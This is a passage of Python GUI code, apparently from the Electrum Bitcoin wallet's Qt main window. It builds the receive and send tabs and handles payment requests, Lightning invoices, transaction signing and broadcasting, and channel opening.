self.create_list_tab(l, toolbar) def show_address(self, addr): from . import address_dialog d = address_dialog.AddressDialog(self, addr) d.exec_() def show_channel(self, channel_id): from . import channel_details channel_details.ChannelDetailsDialog(self, channel_id).show() def show_transaction(self, tx, *, tx_desc=None): '''tx_desc is set only for txs created in the Send tab''' show_transaction(tx, parent=self, desc=tx_desc) def show_lightning_transaction(self, tx_item): from .lightning_tx_dialog import LightningTxDialog d = LightningTxDialog(self, tx_item) d.show() def create_receive_tab(self): # A 4-column grid layout. All the stretch is in the last column. 
        # The exchange rate plugin adds a fiat widget in column 2
        self.receive_grid = grid = QGridLayout()
        grid.setSpacing(8)
        grid.setColumnStretch(3, 1)

        self.receive_message_e = QLineEdit()
        grid.addWidget(QLabel(_('Description')), 0, 0)
        grid.addWidget(self.receive_message_e, 0, 1, 1, 4)
        self.receive_message_e.textChanged.connect(self.update_receive_qr)

        self.receive_amount_e = BTCAmountEdit(self.get_decimal_point)
        grid.addWidget(QLabel(_('Requested amount')), 1, 0)
        grid.addWidget(self.receive_amount_e, 1, 1)
        self.receive_amount_e.textChanged.connect(self.update_receive_qr)

        self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
        if not self.fx or not self.fx.is_enabled():
            self.fiat_receive_e.setVisible(False)
        grid.addWidget(self.fiat_receive_e, 1, 2, Qt.AlignLeft)

        self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
        self.connect_fields(self, self.amount_e, self.fiat_send_e, None)

        self.expires_combo = QComboBox()
        evl = sorted(pr_expiration_values.items())
        evl_keys = [i[0] for i in evl]
        evl_values = [i[1] for i in evl]
        default_expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
        try:
            i = evl_keys.index(default_expiry)
        except ValueError:
            i = 0
        self.expires_combo.addItems(evl_values)
        self.expires_combo.setCurrentIndex(i)
        self.expires_combo.setFixedWidth(self.receive_amount_e.width())
        def on_expiry(i):
            self.config.set_key('request_expiry', evl_keys[i])
        self.expires_combo.currentIndexChanged.connect(on_expiry)
        msg = ''.join([
            _('Expiration date of your request.'), ' ',
            _('This information is seen by the recipient if you send them a signed payment request.'),
            '\n\n',
            _('For on-chain requests, the address gets reserved until expiration. After that, it might get reused.'), ' ',
            _('The bitcoin address never expires and will always be part of this electrum wallet.'), ' ',
            _('You can reuse a bitcoin address any number of times but it is not good for your privacy.'),
            '\n\n',
            _('For Lightning requests, payments will not be accepted after the expiration.'),
        ])
        grid.addWidget(HelpLabel(_('Expires after') + ' (?)', msg), 2, 0)
        grid.addWidget(self.expires_combo, 2, 1)
        self.expires_label = QLineEdit('')
        self.expires_label.setReadOnly(1)
        self.expires_label.setFocusPolicy(Qt.NoFocus)
        self.expires_label.hide()
        grid.addWidget(self.expires_label, 2, 1)

        self.clear_invoice_button = QPushButton(_('Clear'))
        self.clear_invoice_button.clicked.connect(self.clear_receive_tab)
        self.create_invoice_button = QPushButton(_('New Address'))
        self.create_invoice_button.setIcon(read_QIcon("bitcoin.png"))
        self.create_invoice_button.setToolTip('Create on-chain request')
        self.create_invoice_button.clicked.connect(lambda: self.create_invoice(False))
        self.receive_buttons = buttons = QHBoxLayout()
        buttons.addStretch(1)
        buttons.addWidget(self.clear_invoice_button)
        buttons.addWidget(self.create_invoice_button)
        if self.wallet.has_lightning():
            self.create_invoice_button.setText(_('New Address'))
            self.create_lightning_invoice_button = QPushButton(_('Lightning'))
            self.create_lightning_invoice_button.setToolTip('Create lightning request')
            self.create_lightning_invoice_button.setIcon(read_QIcon("lightning.png"))
            self.create_lightning_invoice_button.clicked.connect(lambda: self.create_invoice(True))
            buttons.addWidget(self.create_lightning_invoice_button)
        grid.addLayout(buttons, 4, 3, 1, 2)

        self.receive_payreq_e = ButtonsTextEdit()
        self.receive_payreq_e.setFont(QFont(MONOSPACE_FONT))
        self.receive_payreq_e.addCopyButton(self.app)
        self.receive_payreq_e.setReadOnly(True)
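        # Keep the request QR code (and the detached QR window, if open) in sync with the payment request text.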
self.receive_payreq_e.textChanged.connect(self.update_receive_qr) self.receive_payreq_e.setFocusPolicy(Qt.ClickFocus) self.receive_qr = QRCodeWidget(fixedSize=220) self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window() self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor)) self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor)) self.receive_address_e = ButtonsTextEdit() self.receive_address_e.setFont(QFont(MONOSPACE_FONT)) self.receive_address_e.addCopyButton(self.app) self.receive_address_e.setReadOnly(True) self.receive_address_e.textChanged.connect(self.update_receive_address_styling) qr_show = lambda: self.show_qrcode(str(self.receive_address_e.text()), _('Receiving address'), parent=self) qr_icon = "qrcode_white.png" if ColorScheme.dark_scheme else "qrcode.png" self.receive_address_e.addButton(qr_icon, qr_show, _("Show as QR code")) self.receive_requests_label = QLabel(_('Receive queue')) from .request_list import RequestList self.request_list = RequestList(self) receive_tabs = QTabWidget() receive_tabs.addTab(self.receive_address_e, _('Address')) receive_tabs.addTab(self.receive_payreq_e, _('Request')) receive_tabs.addTab(self.receive_qr, _('QR Code')) receive_tabs.setCurrentIndex(self.config.get('receive_tabs_index', 0)) receive_tabs.currentChanged.connect(lambda i: self.config.set_key('receive_tabs_index', i)) receive_tabs_sp = receive_tabs.sizePolicy() receive_tabs_sp.setRetainSizeWhenHidden(True) receive_tabs.setSizePolicy(receive_tabs_sp) def maybe_hide_receive_tabs(): receive_tabs.setVisible(bool(self.receive_payreq_e.text())) self.receive_payreq_e.textChanged.connect(maybe_hide_receive_tabs) maybe_hide_receive_tabs() # layout vbox_g = QVBoxLayout() vbox_g.addLayout(grid) vbox_g.addStretch() hbox = QHBoxLayout() hbox.addLayout(vbox_g) hbox.addStretch() hbox.addWidget(receive_tabs) w = QWidget() w.searchable_list = self.request_list vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.receive_requests_label) vbox.addWidget(self.request_list) vbox.setStretchFactor(self.request_list, 1000) return w def delete_requests(self, keys): for key in keys: self.wallet.delete_request(key) self.request_list.update() self.clear_receive_tab() def delete_lightning_payreq(self, payreq_key): self.wallet.lnworker.delete_invoice(payreq_key) self.request_list.update() self.invoice_list.update() self.clear_receive_tab() def sign_payment_request(self, addr): alias = self.config.get('alias') if alias and self.alias_info: alias_addr, alias_name, validated = self.alias_info if alias_addr: if self.wallet.is_mine(alias_addr): msg = _('This payment request will be signed.') + '\n' + _('Please enter your password') password = None if self.wallet.has_keystore_encryption(): password = self.password_dialog(msg) if not password: return try: self.wallet.sign_payment_request(addr, alias, alias_addr, password) except Exception as e: self.show_error(repr(e)) return else: return def create_invoice(self, is_lightning): amount = self.receive_amount_e.get_amount() message = self.receive_message_e.text() expiry = self.config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING) if is_lightning: if not self.wallet.lnworker.channels: self.show_error(_("You need to open a Lightning channel first.")) return # TODO maybe show a warning if amount exceeds lnworker.num_sats_can_receive (as in kivy) key = self.wallet.lnworker.add_request(amount, message, expiry) else: key = 
self.create_bitcoin_request(amount, message, expiry) if not key: return self.address_list.update() assert key is not None self.request_list.update() self.request_list.select_key(key) # clear request fields self.receive_amount_e.setText('') self.receive_message_e.setText('') # copy to clipboard r = self.wallet.get_request(key) content = r.invoice if r.is_lightning() else r.get_address() title = _('Invoice') if is_lightning else _('Address') self.do_copy(content, title=title) def create_bitcoin_request(self, amount, message, expiration) -> Optional[str]: addr = self.wallet.get_unused_address() if addr is None: if not self.wallet.is_deterministic(): # imported wallet msg = [ _('No more addresses in your wallet.'), ' ', _('You are using a non-deterministic wallet, which cannot create new addresses.'), ' ', _('If you want to create new addresses, use a deterministic wallet instead.'), '\n\n', _('Creating a new payment request will reuse one of your addresses and overwrite an existing request. Continue anyway?'), ] if not self.question(''.join(msg)): return addr = self.wallet.get_receiving_address() else: # deterministic wallet if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")): return addr = self.wallet.create_new_address(False) req = self.wallet.make_payment_request(addr, amount, message, expiration) try: self.wallet.add_payment_request(req) except Exception as e: self.logger.exception('Error adding payment request') self.show_error(_('Error adding payment request') + ':\n' + repr(e)) else: self.sign_payment_request(addr) return addr def do_copy(self, content: str, *, title: str = None) -> None: self.app.clipboard().setText(content) if title is None: tooltip_text = _("Text copied to clipboard").format(title) else: tooltip_text = _("{} copied to clipboard").format(title) QToolTip.showText(QCursor.pos(), tooltip_text, self) def clear_receive_tab(self): self.receive_payreq_e.setText('') self.receive_address_e.setText('') self.receive_message_e.setText('') self.receive_amount_e.setAmount(None) self.expires_label.hide() self.expires_combo.show() self.request_list.clearSelection() def toggle_qr_window(self): from . 
import qrwindow if not self.qr_window: self.qr_window = qrwindow.QR_Window(self) self.qr_window.setVisible(True) self.qr_window_geometry = self.qr_window.geometry() else: if not self.qr_window.isVisible(): self.qr_window.setVisible(True) self.qr_window.setGeometry(self.qr_window_geometry) else: self.qr_window_geometry = self.qr_window.geometry() self.qr_window.setVisible(False) self.update_receive_qr() def show_send_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab)) def show_receive_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab)) def update_receive_qr(self): uri = str(self.receive_payreq_e.text()) if maybe_extract_bolt11_invoice(uri): # encode lightning invoices as uppercase so QR encoding can use # alphanumeric mode; resulting in smaller QR codes uri = uri.upper() self.receive_qr.setData(uri) if self.qr_window and self.qr_window.isVisible(): self.qr_window.qrw.setData(uri) def update_receive_address_styling(self): addr = str(self.receive_address_e.text()) if is_address(addr) and self.wallet.is_used(addr): self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True)) self.receive_address_e.setToolTip(_("This address has already been used. " "For better privacy, do not reuse it for new payments.")) else: self.receive_address_e.setStyleSheet("") self.receive_address_e.setToolTip("") def create_send_tab(self): # A 4-column grid layout. All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.send_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) from .paytoedit import PayToEdit self.amount_e = BTCAmountEdit(self.get_decimal_point) self.payto_e = PayToEdit(self) self.payto_e.addPasteButton(self.app) msg = _('Recipient of the funds.') + '\n\n'\ + _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)') payto_label = HelpLabel(_('Pay to'), msg) grid.addWidget(payto_label, 1, 0) grid.addWidget(self.payto_e, 1, 1, 1, -1) completer = QCompleter() completer.setCaseSensitivity(False) self.payto_e.set_completer(completer) completer.setModel(self.completions) msg = _('Description of the transaction (not mandatory).') + '\n\n'\ + _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.') description_label = HelpLabel(_('Description'), msg) grid.addWidget(description_label, 2, 0) self.message_e = FreezableLineEdit() self.message_e.setMinimumWidth(700) grid.addWidget(self.message_e, 2, 1, 1, -1) msg = _('Amount to be sent.') + '\n\n' \ + _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \ + _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \ + _('Keyboard shortcut: type "!" 
to send all your coins.') amount_label = HelpLabel(_('Amount'), msg) grid.addWidget(amount_label, 3, 0) grid.addWidget(self.amount_e, 3, 1) self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_send_e.setVisible(False) grid.addWidget(self.fiat_send_e, 3, 2) self.amount_e.frozen.connect( lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly())) self.max_button = EnterButton(_("Max"), self.spend_max) self.max_button.setFixedWidth(100) self.max_button.setCheckable(True) grid.addWidget(self.max_button, 3, 3) self.save_button = EnterButton(_("Save"), self.do_save_invoice) self.send_button = EnterButton(_("Pay") + "...", self.do_pay) self.clear_button = EnterButton(_("Clear"), self.do_clear) buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.clear_button) buttons.addWidget(self.save_button) buttons.addWidget(self.send_button) grid.addLayout(buttons, 6, 1, 1, 4) self.amount_e.shortcut.connect(self.spend_max) def reset_max(text): self.max_button.setChecked(False) enable = not bool(text) and not self.amount_e.isReadOnly() #self.max_button.setEnabled(enable) self.amount_e.textEdited.connect(reset_max) self.fiat_send_e.textEdited.connect(reset_max) self.set_onchain(False) self.invoices_label = QLabel(_('Send queue')) from .invoice_list import InvoiceList self.invoice_list = InvoiceList(self) vbox0 = QVBoxLayout() vbox0.addLayout(grid) hbox = QHBoxLayout() hbox.addLayout(vbox0) hbox.addStretch(1) w = QWidget() vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.invoices_label) vbox.addWidget(self.invoice_list) vbox.setStretchFactor(self.invoice_list, 1000) w.searchable_list = self.invoice_list run_hook('create_send_tab', grid) return w def spend_max(self): if run_hook('abort_send', self): return outputs = self.payto_e.get_outputs(True) if not outputs: return make_tx = lambda fee_est: self.wallet.make_unsigned_transaction( coins=self.get_coins(), outputs=outputs, fee=fee_est, is_sweep=False) try: try: tx = make_tx(None) except (NotEnoughFunds, NoDynamicFeeEstimates) as e: # Check if we had enough funds excluding fees, # if so, still provide opportunity to set lower fees. tx = make_tx(0) except MultipleSpendMaxTxOutputs as e: self.max_button.setChecked(False) self.show_error(str(e)) return except NotEnoughFunds as e: self.max_button.setChecked(False) text = self.get_text_not_enough_funds_mentioning_frozen() self.show_error(text) return self.max_button.setChecked(True) amount = tx.output_value() __, x_fee_amount = run_hook('get_tx_extra_fee', self.wallet, tx) or (None, 0) amount_after_all_fees = amount - x_fee_amount self.amount_e.setAmount(amount_after_all_fees) def get_contact_payto(self, key): _type, label = self.contacts.get(key) return label + ' <' + key + '>' if _type == 'address' else key def update_completions(self): l = [self.get_contact_payto(key) for key in self.contacts.keys()] self.completions.setStringList(l) @protected def protect(self, func, args, password): return func(*args, password) def read_outputs(self) -> List[PartialTxOutput]: if self.payment_request: outputs = self.payment_request.get_outputs() else: outputs = self.payto_e.get_outputs(self.max_button.isChecked()) return outputs def check_send_tab_onchain_outputs_and_show_errors(self, outputs: List[PartialTxOutput]) -> bool: """Returns whether there are errors with outputs. Also shows error dialog to user if so. 
""" if not outputs: self.show_error(_('No outputs')) return True for o in outputs: if o.scriptpubkey is None: self.show_error(_('Bitcoin Address is None')) return True if o.value is None: self.show_error(_('Invalid Amount')) return True return False # no errors def check_send_tab_payto_line_and_show_errors(self) -> bool: """Returns whether there are errors. Also shows error dialog to user if so. """ pr = self.payment_request if pr: if pr.has_expired(): self.show_error(_('Payment request has expired')) return True if not pr: errors = self.payto_e.get_errors() if errors: if len(errors) == 1 and not errors[0].is_multiline: err = errors[0] self.show_warning(_("Failed to parse 'Pay to' line") + ":\n" + f"{err.line_content[:40]}...\n\n" f"{err.exc!r}") else: self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([_("Line #") + f"{err.idx+1}: {err.line_content[:40]}... ({err.exc!r})" for err in errors])) return True if self.payto_e.is_alias and self.payto_e.validated is False: alias = self.payto_e.toPlainText() msg = _('WARNING: the alias "{}" could not be validated via an additional ' 'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n' msg += _('Do you wish to continue?') if not self.question(msg): return True return False # no errors def pay_lightning_invoice(self, invoice: str, *, amount_msat: Optional[int]): if amount_msat is None: raise Exception("missing amount for LN invoice") amount_sat = Decimal(amount_msat) / 1000 # FIXME this is currently lying to user as we truncate to satoshis msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.format_amount_and_units(amount_sat)) if not self.question(msg): return self.save_pending_invoice() def task(): coro = self.wallet.lnworker.pay_invoice(invoice, amount_msat=amount_msat, attempts=LN_NUM_PAYMENT_ATTEMPTS) fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop) return fut.result() self.wallet.thread.add(task) def on_request_status(self, wallet, key, status): if wallet != self.wallet: return req = self.wallet.receive_requests.get(key) if req is None: return if status == PR_PAID: self.notify(_('Payment received') + '\n' + key) self.need_update.set() else: self.request_list.update_item(key, req) def on_invoice_status(self, wallet, key): if wallet != self.wallet: return invoice = self.wallet.get_invoice(key) if invoice is None: return status = self.wallet.get_invoice_status(invoice) if status == PR_PAID: self.invoice_list.update() else: self.invoice_list.update_item(key, invoice) def on_payment_succeeded(self, wallet, key): description = self.wallet.get_label(key) self.notify(_('Payment succeeded') + '\n\n' + description) self.need_update.set() def on_payment_failed(self, wallet, key, reason): self.show_error(_('Payment failed') + '\n\n' + reason) def read_invoice(self): if self.check_send_tab_payto_line_and_show_errors(): return if not self._is_onchain: invoice_str = self.payto_e.lightning_invoice if not invoice_str: return if not self.wallet.has_lightning(): self.show_error(_('Lightning is disabled')) return invoice = LNInvoice.from_bech32(invoice_str) if invoice.get_amount_msat() is None: amount_sat = self.amount_e.get_amount() if amount_sat: invoice.amount_msat = int(amount_sat * 1000) else: self.show_error(_('No amount')) return return invoice else: outputs = self.read_outputs() if self.check_send_tab_onchain_outputs_and_show_errors(outputs): return message = self.message_e.text() return self.wallet.create_invoice( outputs=outputs, message=message, 
pr=self.payment_request, URI=self.payto_URI) def do_save_invoice(self): self.pending_invoice = self.read_invoice() if not self.pending_invoice: return self.save_pending_invoice() def save_pending_invoice(self): if not self.pending_invoice: return self.do_clear() self.wallet.save_invoice(self.pending_invoice) self.invoice_list.update() self.pending_invoice = None def do_pay(self): self.pending_invoice = self.read_invoice() if not self.pending_invoice: return self.do_pay_invoice(self.pending_invoice) def pay_multiple_invoices(self, invoices): outputs = [] for invoice in invoices: outputs += invoice.outputs self.pay_onchain_dialog(self.get_coins(), outputs) def do_pay_invoice(self, invoice: 'Invoice'): if invoice.type == PR_TYPE_LN: assert isinstance(invoice, LNInvoice) self.pay_lightning_invoice(invoice.invoice, amount_msat=invoice.get_amount_msat()) elif invoice.type == PR_TYPE_ONCHAIN: assert isinstance(invoice, OnchainInvoice) self.pay_onchain_dialog(self.get_coins(), invoice.outputs) else: raise Exception('unknown invoice type') def get_coins(self, *, nonlocal_only=False) -> Sequence[PartialTxInput]: coins = self.get_manually_selected_coins() if coins is not None: return coins else: return self.wallet.get_spendable_coins(None, nonlocal_only=nonlocal_only) def get_manually_selected_coins(self) -> Optional[Sequence[PartialTxInput]]: """Return a list of selected coins or None. Note: None means selection is not being used, while an empty sequence means the user specifically selected that. """ return self.utxo_list.get_spend_list() def get_text_not_enough_funds_mentioning_frozen(self) -> str: text = _("Not enough funds") frozen_bal = sum(self.wallet.get_frozen_balance()) if frozen_bal: text += " ({} {} {})".format( self.format_amount(frozen_bal).strip(), self.base_unit(), _("are frozen") ) return text def pay_onchain_dialog( self, inputs: Sequence[PartialTxInput], outputs: List[PartialTxOutput], *, external_keypairs=None) -> None: # trustedcoin requires this if run_hook('abort_send', self): return is_sweep = bool(external_keypairs) make_tx = lambda fee_est: self.wallet.make_unsigned_transaction( coins=inputs, outputs=outputs, fee=fee_est, is_sweep=is_sweep) output_values = [x.value for x in outputs] if output_values.count('!') > 1: self.show_error(_("More than one output set to spend max")) return output_value = '!' if '!' in output_values else sum(output_values) conf_dlg = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=output_value, is_sweep=is_sweep) if conf_dlg.not_enough_funds: # Check if we had enough funds excluding fees, # if so, still provide opportunity to set lower fees. if not conf_dlg.have_enough_funds_assuming_zero_fees(): text = self.get_text_not_enough_funds_mentioning_frozen() self.show_message(text) return # shortcut to advanced preview (after "enough funds" check!) 
if self.config.get('advanced_preview'): preview_dlg = PreviewTxDialog( window=self, make_tx=make_tx, external_keypairs=external_keypairs, output_value=output_value) preview_dlg.show() return cancelled, is_send, password, tx = conf_dlg.run() if cancelled: return if is_send: self.save_pending_invoice() def sign_done(success): if success: self.broadcast_or_show(tx) self.sign_tx_with_password(tx, callback=sign_done, password=password, external_keypairs=external_keypairs) else: preview_dlg = PreviewTxDialog( window=self, make_tx=make_tx, external_keypairs=external_keypairs, output_value=output_value) preview_dlg.show() def broadcast_or_show(self, tx: Transaction): if not tx.is_complete(): self.show_transaction(tx) return if not self.network: self.show_error(_("You can't broadcast a transaction without a live network connection.")) self.show_transaction(tx) return self.broadcast_transaction(tx) @protected def sign_tx(self, tx, *, callback, external_keypairs, password): self.sign_tx_with_password(tx, callback=callback, password=password, external_keypairs=external_keypairs) def sign_tx_with_password(self, tx: PartialTransaction, *, callback, password, external_keypairs=None): '''Sign the transaction in a separate thread. When done, calls the callback with a success code of True or False. ''' def on_success(result): callback(True) def on_failure(exc_info): self.on_error(exc_info) callback(False) on_success = run_hook('tc_sign_wrapper', self.wallet, tx, on_success, on_failure) or on_success if external_keypairs: # can sign directly task = partial(tx.sign, external_keypairs) else: task = partial(self.wallet.sign_transaction, tx, password) msg = _('Signing transaction...') WaitingDialog(self, msg, task, on_success, on_failure) def broadcast_transaction(self, tx: Transaction): def broadcast_thread(): # non-GUI thread pr = self.payment_request if pr and pr.has_expired(): self.payment_request = None return False, _("Invoice has expired") try: self.network.run_from_another_thread(self.network.broadcast_transaction(tx)) except TxBroadcastError as e: return False, e.get_message_for_gui() except BestEffortRequestFailed as e: return False, repr(e) # success txid = tx.txid() if pr: self.payment_request = None refund_address = self.wallet.get_receiving_address() coro = pr.send_payment_and_receive_paymentack(tx.serialize(), refund_address) fut = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop) ack_status, ack_msg = fut.result(timeout=20) self.logger.info(f"Payment ACK: {ack_status}. 
Ack message: {ack_msg}") return True, txid # Capture current TL window; override might be removed on return parent = self.top_level_window(lambda win: isinstance(win, MessageBoxMixin)) def broadcast_done(result): # GUI thread if result: success, msg = result if success: parent.show_message(_('Payment sent.') + '\n' + msg) self.invoice_list.update() else: msg = msg or '' parent.show_error(msg) WaitingDialog(self, _('Broadcasting transaction...'), broadcast_thread, broadcast_done, self.on_error) def mktx_for_open_channel(self, *, funding_sat, node_id): coins = self.get_coins(nonlocal_only=True) make_tx = lambda fee_est: self.wallet.lnworker.mktx_for_open_channel( coins=coins, funding_sat=funding_sat, node_id=node_id, fee_est=fee_est) return make_tx def open_channel(self, connect_str, funding_sat, push_amt): try: node_id, rest = extract_nodeid(connect_str) except ConnStringFormatError as e: self.show_error(str(e)) return # use ConfirmTxDialog # we need to know the fee before we broadcast, because the txid is required make_tx = self.mktx_for_open_channel(funding_sat=funding_sat, node_id=node_id) d = ConfirmTxDialog(window=self, make_tx=make_tx, output_value=funding_sat, is_sweep=False) # disable preview button because the user must not broadcast tx before establishment_flow d.preview_button.setEnabled(False) cancelled, is_send, password, funding_tx = d.run() if not is_send: return if cancelled: return # read funding_sat from tx; converts '!' to int value funding_sat = funding_tx.output_value_for_address(ln_dummy_address()) def task(): return self.wallet.lnworker.open_channel( connect_str=connect_str, funding_tx=funding_tx, funding_sat=funding_sat, push_amt_sat=push_amt, password=password) def on_failure(exc_info): type_, e, traceback = exc_info self.show_error(_('Could not open channel: {}').format(repr(e))) WaitingDialog(self, _('Opening channel...'), task, self.on_open_channel_success, on_failure) def on_open_channel_success(self, args): chan, funding_tx = args lnworker = self.wallet.lnworker if not chan.has_onchain_backup(): backup_dir = self.config.get_backup_dir() if backup_dir is not None: self.show_message(_(f'Your wallet backup has been updated in {backup_dir}')) else: data = lnworker.export_channel_backup(chan.channel_id) help_text = _(messages.MSG_CREATED_NON_RECOVERABLE_CHANNEL) self.show_qrcode( data, _('Save channel backup'), help_text=help_text, show_copy_text_btn=True) n = chan.constraints.funding_txn_minimum_depth message = '\n'.join([ _('Channel established.'), _('Remote peer ID') + ':' + chan.node_id.hex(), _('This channel will be usable after {} confirmations').format(n) ]) if not funding_tx.is_complete(): message += '\n\n' + _('Please sign and broadcast the funding transaction') self.show_message(message) self.show_transaction(funding_tx) else: self.show_message(message) def query_choice(self, msg, choices): # Needed by QtHandler for hardware wallets dialog = WindowModalDialog(self.top_level_window()) clayout = ChoicesLayout(msg, choices) vbox = QVBoxLayout(dialog) vbox.addLayout(clayout.layout()) vbox.addLayout(Buttons(OkButton(dialog))) if not dialog.exec_(): return None return clayout.selected_index() def lock_amount(self, b: bool) -> None: self.amount_e.setFrozen(b) self.max_button.setEnabled(not b) def prepare_for_payment_request(self): self.show_send_tab() self.payto_e.is_pr = True for e in [self.payto_e, self.message_e]: e.setFrozen(True) self.lock_amount(True) self.payto_e.setText(_("please wait...")) return True def delete_invoices(self, keys): for key in keys: 
self.wallet.delete_invoice(key) self.invoice_list.update() def payment_request_ok(self): pr = self.payment_request if not pr: return key = pr.get_id() invoice = self.wallet.get_invoice(key) if invoice and self.wallet.get_invoice_status(invoice) == PR_PAID: self.show_message("invoice already paid") self.do_clear() self.payment_request = None return self.payto_e.is_pr = True if not pr.has_expired(): self.payto_e.setGreen() else: self.payto_e.setExpired() self.payto_e.setText(pr.get_requestor()) self.amount_e.setAmount(pr.get_amount()) self.message_e.setText(pr.get_memo()) # signal to set fee self.amount_e.textEdited.emit("") def payment_request_error(self): pr = self.payment_request if not pr: return self.show_message(pr.error) self.payment_request = None self.do_clear() def on_pr(self, request: 'paymentrequest.PaymentRequest'): self.set_onchain(True) self.payment_request = request if self.payment_request.verify(self.contacts): self.payment_request_ok_signal.emit() else: self.payment_request_error_signal.emit() def parse_lightning_invoice(self, invoice): """Parse ln invoice, and prepare the send tab for it.""" try: lnaddr = lndecode(invoice, expected_hrp=constants.net.SEGWIT_HRP) except Exception as e: raise LnDecodeException(e) from e pubkey = bh2u(lnaddr.pubkey.serialize()) for k,v in lnaddr.tags: if k == 'd': description = v break else: description = '' self.payto_e.setFrozen(True) self.payto_e.setText(pubkey) self.message_e.setText(description) if lnaddr.get_amount_sat() is not None: self.amount_e.setAmount(lnaddr.get_amount_sat()) #self.amount_e.textEdited.emit("") self.set_onchain(False) def set_onchain(self, b): self._is_onchain = b self.max_button.setEnabled(b) def pay_to_URI(self, URI): if not URI: return try: out = util.parse_URI(URI, self.on_pr) except InvalidBitcoinURI as e: self.show_error(_("Error parsing URI") + f":\n{e}") return self.show_send_tab() self.payto_URI = out r = out.get('r') sig = out.get('sig') name = out.get('name') if r or (name and sig): self.prepare_for_payment_request() return address = out.get('address') amount = out.get('amount') label = out.get('label') message = out.get('message') # use label as description (not BIP21 compliant) if label and not message: message = label if address: self.payto_e.setText(address) if message: self.message_e.setText(message) if amount: self.amount_e.setAmount(amount) self.amount_e.textEdited.emit("") def do_clear(self): self.max_button.setChecked(False) self.payment_request = None self.payto_URI = None self.payto_e.is_pr = False self.set_onchain(False) for e in [self.payto_e, self.message_e, self.amount_e]: e.setText('') e.setFrozen(False) self.update_status() run_hook('do_clear', self) def set_frozen_state_of_addresses(self, addrs, freeze: bool): self.wallet.set_frozen_state_of_addresses(addrs, freeze) self.address_list.update() self.utxo_list.update() def set_frozen_state_of_coins(self, utxos: Sequence[PartialTxInput], freeze: bool): utxos_str = {utxo.prevout.to_str() for utxo in utxos} self.wallet.set_frozen_state_of_coins(utxos_str, freeze) self.utxo_list.update() def create_list_tab(self, l, toolbar=None): w = QWidget() w.searchable_list = l vbox = QVBoxLayout() w.setLayout(vbox) #vbox.setContentsMargins(0, 0, 0, 0) #vbox.setSpacing(0) if toolbar: vbox.addLayout(toolbar) vbox.addWidget(l) return w def create_addresses_tab(self): from .address_list import AddressList self.address_list = l = AddressList(self) toolbar = l.create_toolbar(self.config) toolbar_shown = bool(self.config.get('show_toolbar_addresses', False)) 
l.show_toolbar(toolbar_shown) return self.create_list_tab(l, toolbar) def create_utxo_tab(self): from .utxo_list import UTXOList self.utxo_list = UTXOList(self) return self.create_list_tab(self.utxo_list) def create_contacts_tab(self): from .contact_list import ContactList self.contact_list = l = ContactList(self) return self.create_list_tab(l) def remove_address(self, addr): if not self.question(_("Do you want to remove {} from your wallet?").format(addr)): return try: self.wallet.delete_address(addr) except UserFacingException as e: self.show_error(str(e)) else: self.need_update.set() # history, addresses, coins self.clear_receive_tab() def paytomany(self): self.show_send_tab() self.payto_e.paytomany() msg = '\n'.join([ _('Enter a list of outputs in the \'Pay to\' field.'), _('One output per line.'), _('Format: address, amount'), _('You may load a CSV file using the file icon.') ]) self.show_message(msg, title=_('Pay to many')) def payto_contacts(self, labels): paytos = [self.get_contact_payto(label) for label in labels] self.show_send_tab() if len(paytos) == 1: self.payto_e.setText(paytos[0]) self.amount_e.setFocus() else: text = "\n".join([payto + ", 0" for payto in paytos]) self.payto_e.setText(text) self.payto_e.setFocus() def set_contact(self, label, address): if not is_address(address): self.show_error(_('Invalid Address')) self.contact_list.update() # Displays original unchanged value return False self.contacts[address] = ('address', label) self.contact_list.update() self.history_list.update() self.update_completions() return True def delete_contacts(self, labels): if not self.question(_("Remove {} from your list of contacts?") .format(" + ".join(labels))): return for label in labels: self.contacts.pop(label) self.history_list.update() self.contact_list.update() self.update_completions() def show_onchain_invoice(self, invoice: OnchainInvoice): amount_str = self.format_amount(invoice.amount_sat) + ' ' + self.base_unit() d = WindowModalDialog(self, _("Onchain Invoice")) vbox = QVBoxLayout(d) grid = QGridLayout() grid.addWidget(QLabel(_("Amount") + ':'), 1, 0) grid.addWidget(QLabel(amount_str), 1, 1) if len(invoice.outputs) == 1: grid.addWidget(QLabel(_("Address") + ':'), 2, 0) grid.addWidget(QLabel(invoice.get_address()), 2, 1) else: outputs_str = '\n'.join(map(lambda x: x.address + ' : ' + self.format_amount(x.value)+ self.base_unit(), invoice.outputs)) grid.addWidget(QLabel(_("Outputs") + ':'), 2, 0) 